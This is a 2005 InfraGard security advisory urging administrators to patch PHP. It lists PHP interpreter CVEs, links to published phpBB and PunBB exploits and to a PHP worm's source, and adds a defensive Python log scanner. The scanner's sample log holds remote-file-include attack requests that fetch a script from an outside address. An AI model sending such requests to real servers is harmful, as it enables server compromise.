PHP Vulnerabilities: URGENT ATTENTION NEEDED

- Gary Warner

I'm sending this note to remind people that each day HUNDREDS (if not thousands) of servers on the Internet are being rooted because of PHP Vulnerabilities.

In the April meeting of the InfraGard Birmingham Members Alliance, I did a presentation on this topic, drawing URGENT ATTENTION to this matter. Because these rooted servers are being used as distribution points for Phishing, spam, and all manner of malware, it is in all of our interests to shut these things down. In addition to the many product vulnerabilities caused by poor coding practice in individual PHP applications, there are also many vulnerabilities in the underlying PHP platform itself which must be taken seriously.

Symantec rates the general category of PHP Multiple Local and Remote Vulnerabilities as:

Urgency = 9.3
Severity = 9.5
Impact = 9
Ease of Exploit = 10

The most detailed review of these problems is probably at Security Focus:

PHP Multiple Local and Remote Vulnerabilities


CVE entries (listed under their CAN- candidate numbers) that deal with the hot PHP issues include the following. Specifically . . .
  • the "unpack()" function call has a memory disclosure issue
  • the "safe_mode_exec_dir" has an access control bypass vulnerability
  • the "safe_mode" has an access control bypass vulnerability
  • the "realpath()" function call has a truncation vulnerability
CAN-2004-0958
php_variables.c in PHP before 5.0.2 allows remote attackers to read sensitive memory contents via (1) GET, (2) POST, or (3) COOKIE GPC variables that end in an open bracket character, which causes PHP to calculate an incorrect string length.
CAN-2004-0959
rfc1867.c in PHP before 5.0.2 allows local users to upload files to arbitrary locations via a PHP script with a certain MIME header that causes the "$_FILES" array to be modified.
CAN-2004-1019
The deserialization code in PHP before 4.3.10 and PHP 5.x up to 5.0.2 allows remote attackers to cause a denial of service and execute arbitrary code via untrusted data to the unserialize function that may trigger "information disclosure, double free and negative reference index array underflow" results.
CAN-2004-1018
Multiple integer handling errors in PHP before 4.3.10 allow attackers to bypass safe mode restrictions, cause a denial of service, or execute arbitrary code via (1) a negative offset value to the shmop_write function, (2) an "integer overflow/underflow" in the pack function, or (3) an "integer overflow/underflow" in the unpack function.
CAN-2004-1063
PHP 4.x to 4.3.9, and PHP 5.x to 5.0.2, when running in safe mode on a multithreaded Unix webserver, allows local users to bypass safe_mode_exec_dir restrictions and execute commands outside of the intended safe_mode_exec_dir via shell metacharacters in the current directory name.
CAN-2004-1064
The safe mode checks in PHP 4.x to 4.3.9 and PHP 5.x to 5.0.2 truncate the file path before passing the data to the realpath function, which could allow attackers to bypass safe mode.

Some other useful articles and pointers here . . .

Red Hat php fixes:
http://rhn.redhat.com/errata/RHSA-2004-687.html

ISS X-Force on PHP problems:


ALL OF THE ISSUES ABOVE THIS LINE ARE WEAKNESSES IN THE PHP INTERPRETER ITSELF, NOT IN ANY ONE APPLICATION WRITTEN IN PHP. Patching an individual application does not fix them; the interpreter has to be upgraded (per the CAN entries above, to 4.3.10 or later on the 4.x branch and to a release after 5.0.2 on the 5.x branch; "php -v" on the server shows the installed version). See the Security Focus advisory for links to many vendor sites that provide patches, but PLEASE USE CAUTION BEFORE IMPLEMENTING ANY PHP SOLUTION!!!


I've also had many requests since the presentation to provide links to some of the vulnerable product information:

The main site for checking to see if your PHP application has vulnerabilities is PHPSecure.info. They have an alphabetical list of 394 PHP-based applications known to have at least one security vulnerability:

So, you can just check the list to see that, for example, "phpMyAdmin" has had 56 published vulnerabilities, or that phpNuke 7.x has had 171 published vulnerabilities. Convenient links from that list will take you to the Secunia alert page for that product, which will tell you whether applying the vendor patches fully resolves the advisories, or whether you will instead see a notice like these:

  • http://secunia.com/product/4879/ -- PayProCart 3.x with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Moderately critical
  • http://secunia.com/product/4457/ -- Zeroboard 4.x with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Highly critical

There are several widespread exploits. Examples of these would include:

phpBB exploit:
http://www.frsirt.com/exploits/20050314.phpbbexp.cpp.php

PunBB exploit:
http://www.frsirt.com/exploits/20050329.r57punbb.pl.php

Forum-Aztec exploit:
http://www.frsirt.com/exploits/20050307.aztek.c.php

And here is the source of a PHP worm that attacks common PHP coding mistakes and spreads itself by using Google lookups to find new targets. Varieties of this worm are compromising PHP boxes which are then used for Phishing. Among the many sites vulnerable to this style of worm are phpBB sites. (The current version of phpBB is 2.0.14, released April 15, 2005 -- the last "critical security update" was 2.0.13, released Feb 27, 2005.)

http://www.frsirt.com/exploits/20041225.PhpIncludeWorm.php
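The following is an added example (not code from the original post, from the worm linked above, or from any vendor) showing the kind of access-log check an administrator can run for two of the patterns described on this page: the CAN-2004-0958 condition (a GET variable whose name ends in an open bracket), and requests that hand a remote URL to a script parameter, which is the usual mechanism of an include-style worm against "common PHP coding mistakes". The second heuristic is our assumption about how such worms operate, not something the post states. The script assumes the Apache "combined" log format; the log lines in SAMPLE_LOG are constructed for this example, with addresses from the RFC 5737 documentation ranges.

```python
"""Scan Apache "combined" access-log lines for two PHP attack patterns.

  1. gpc-open-bracket: a query-string variable whose NAME ends in "[",
     the condition CAN-2004-0958 says makes PHP before 5.0.2 miscalculate
     a string length and leak memory.  Only the GET form is visible in an
     access log; the POST and COOKIE forms the CVE also lists are not
     recorded by Apache, so absence here does not prove absence of probes.
  2. remote-include: a query-string variable whose VALUE is itself a URL
     (http://, https://, ftp://).  Assumption: an include-style worm works
     by feeding a remote URL to an unvalidated include(); the heuristic is
     this example's, not the original post's.

Added example code; SAMPLE_LOG is constructed, not taken from a real server.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format:
#   ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A parameter value that is itself a URL pointing at another host.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Constructed sample: one benign hit, two remote-include attempts from the same
# client (one plain, one percent-encoded), one open-bracket probe, one POST.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Apr/2005:10:01:22 -0500] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
198.51.100.7 - - [15/Apr/2005:10:02:05 -0500] "GET /index.php?page=http://203.0.113.9/cmd.txt? HTTP/1.1" 200 88 "-" "Mozilla/4.0"
198.51.100.7 - - [15/Apr/2005:10:02:09 -0500] "GET /index.php?page=http%3A%2F%2F203.0.113.9%2Fcmd.txt%3F HTTP/1.1" 200 88 "-" "Mozilla/4.0"
203.0.113.44 - - [15/Apr/2005:10:03:41 -0500] "GET /search.php?q%5B=x&id=7 HTTP/1.1" 500 0 "-" "curl/7.12.0"
192.0.2.11 - - [15/Apr/2005:10:04:00 -0500] "POST /login.php HTTP/1.1" 302 0 "http://example.com/" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return a list of (tag, detail) findings for one parsed log entry."""
    findings = []
    query = urlsplit(entry['target']).query
    # keep_blank_values so a bare "name[" with no "=" still comes back as a
    # parameter; parse_qsl also percent-decodes, so %5B is seen as "[".
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.endswith('['):
            findings.append(('gpc-open-bracket', name))
        if REMOTE_URL_RE.match(value):
            findings.append(('remote-include', f'{name}={value}'))
    return findings


def scan(log_text):
    """Map each client IP to the findings its requests raised (IPs with none are omitted)."""
    hits = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # not a combined-format line; skip rather than guess
        findings = classify(entry)
        if findings:
            hits.setdefault(entry['ip'], []).extend(findings)
    return hits


if __name__ == '__main__':
    for ip, findings in scan(SAMPLE_LOG).items():
        for tag, detail in findings:
            print(f'{ip}\t{tag}\t{detail}')
```

Run it against a real log by replacing SAMPLE_LOG with the file contents. A remote-include hit with a 200 status deserves immediate attention, since it means the script accepted the request; a bracket probe that produced a 500 is at least evidence someone is testing for CAN-2004-0958 and the PHP version should be confirmed.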


I hope that this information is helpful to you. Please feel free to pass this on to any other concerned parties.

_-_
gary warner
gar@askgar.com
a proud member of
InfraGard Birmingham Members Alliance
http://www.birmingham-infragard.org/

© 2005-2007 Birmingham InfraGard, Daniel Clemens and Gary Warner. Original Site design by airmobile.com.